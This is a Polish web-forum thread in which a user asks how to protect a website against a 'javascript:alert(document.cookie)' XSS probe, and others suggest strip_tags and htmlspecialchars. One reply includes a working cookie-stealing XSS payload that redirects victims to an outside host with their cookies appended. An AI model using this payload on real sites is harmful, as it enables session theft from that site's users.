javascript:alert(document.cookie);

Verdis · Nov 29, 2013

Siemka,
da się jakoś zabezpieczyć stronkę www przed:
"javascript:alert(document.cookie);"..?
Proszę o pomoc.

averatec · Nov 29, 2013

nie rozumiem o co Ci chodzi, o wyciaganie session id? nie da sie... chyba ze masz inny lepszy pomysl na sesje

hemrenus321 · Nov 29, 2013

chodzi pewnie o xss
poczytaj to się dowiesz

ErnesTT · Nov 29, 2013

strip_tags, htmlspecialchars, ale żeby było naprawde bezpiecznie to trzeba napisać większy kod bo są miliony sposobów wykonania xss.

Verdis · Nov 29, 2013

Ostro widzę... ;/ Jest możliwość wykradzenia moich plików z vpsa, nie znając hasła itp.. ? (wykorzystując bugi)

Verdis · Nov 29, 2013

Patrzałem na znanych serverach tibi, nie wyświetla im żadnego komunikatu po wpisaniu: " javascript:alert(document.cookie);" jak to zrobić (zabezpieczyć) ? ;/

averatec · Nov 29, 2013

czy Ty rozumiesz co to XSS?

Verdis · Nov 29, 2013

Oglądałem z 100 filmów na yt o tym.

Crypton3 · Nov 29, 2013

subzero321 said:
Patrzałem na znanych serverach tibi, nie wyświetla im żadnego komunikatu po wpisaniu: " javascript:alert(document.cookie);" jak to zrobić (zabezpieczyć) ? ;/

Ale co ty niby chcesz zabezpieczać? Nie wyświetla nic, ponieważ się tam pewnie nie logowałeś. Jeśli chcesz to przerób sobie acc makera, aby nie pamiętał logowań - pozbędziesz się ciasteczek.

ErnesTT · Nov 30, 2013

subzero321 said:
Oglądałem z 100 filmów na yt o tym.

filmy to nie to samo, lepiej popróbować w praktyce opcji na xss jest tak wiele, ze masakra, a główna jej zaleta to:

Code:

<script>window.location = "http://mojawww.pl/?cookisy="+document.cookie;</script>

javascript:alert(document.cookie);

Verdis

Ciekawy świata.

averatec

Advanced OT User

hemrenus321

Advanced OT User

ErnesTT

Azi styleeee

Verdis

Ciekawy świata.

Verdis

Ciekawy świata.

averatec

Advanced OT User

Verdis

Ciekawy świata.

Crypton3

Retired

ErnesTT

Azi styleeee